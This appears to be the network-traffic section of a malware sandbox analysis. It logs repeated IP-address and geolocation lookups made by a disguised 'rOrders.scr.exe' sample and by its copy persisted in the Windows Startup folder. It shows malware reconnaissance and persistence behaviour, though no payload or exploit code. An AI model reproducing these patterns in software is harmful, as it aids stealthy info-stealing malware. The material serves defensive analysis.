Jan 13, 2025 13:31:19.684025049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:20.359136105 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:20 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49718	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:21.009288073 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:21.862019062 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:22.494086981 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:23.166779995 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:23 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	132.226.247.73	80	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:23.786642075 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:24.458194971 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:24 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49724	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:26.153995991 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:27.853256941 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:27.853964090 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:27.854213953 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:27.854845047 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:27.856682062 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:28.070064068 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:31:29.194169998 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:29.404639959 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49741	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:30.008130074 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 13, 2025 13:31:30.710335016 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49754	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:31.324553013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:32.000776052 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49763	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:32.622405052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:33.313203096 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49769	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:33.959043980 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:34.656569958 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49779	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:35.293595076 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:35.990299940 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49790	132.226.247.73	80	7192	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\00.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 13:31:36.636236906 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 13:31:37.364162922 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:15 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086264 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ba388Pvv9GKMBnAcN2aWUiedUbNmYCJYWlaaYs6EQ2cio%2Badms45Bqak59uClC%2FoQrCko9yXbr54BgTcnAWKssJnHYWNF6h05ZofoaTfrPF%2FRgWti%2FVoax%2BR02HyxxkbKCU2W7TX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901566f78e7841a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1549&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1784841&cwnd=241&unsent_bytes=0&cid=b9ced1d6a95912df&ts=487&x=0"
2025-01-13 12:31:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 12:31:16 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086265 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xb6G3nBxd%2B%2FI1XAazNGd6zXKzlXluKKMvATn15SuetIZpMrmCSw4yQgCIQYZsaIfeAPtp96dNvA2C15uK4WXgpuX42vu07t9BlRa0nWJPQTq2Vmwi%2BCjFKzdbP8gq5%2FzhQs2myeM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901566fcde031875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1647&min_rtt=1628&rtt_var=648&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1639528&cwnd=153&unsent_bytes=0&cid=7527c18342f70e81&ts=148&x=0"
2025-01-13 12:31:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49711	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:17 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:17 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:17 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086266 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WuZAP7HDgQK5XkpUhBFhbQP7wI9zuSGNYnEYLQrfcQxOoO1Rmf0ORKEkM4%2BbIB5XjOHyaXSMvcb1wZABT0WnXEEfPxRmqValyWamNPR6Al4PUzlgK7w01hjw7H7BOVNctSOKOz1t"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90156704fcebc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1589&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1760096&cwnd=189&unsent_bytes=0&cid=7f21284a9638348d&ts=158&x=0"
2025-01-13 12:31:17 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	104.21.32.1	443	4760	C:\Users\user\Desktop\rOrders.scr.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:31:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 12:31:19 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 12:31:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2086268 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6xjJOBL8Rh%2FBRI7O%2Bi6rz4hsnWKL2%2BbuiuwgdcVElsxGuu5j2jt1u9oxUnYeevAdHsnKh8XFiHS7PvR75Vn%2B6nCenjjtePmmZ4vwYWrOaIF9cpFZ750dy4Y7mI1cuxFlBKfblcnS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901567139aed41a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1554&rtt_var=626&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1690793&cwnd=241&unsent_bytes=0&cid=2f939c8047219dfd&ts=154&x=0"
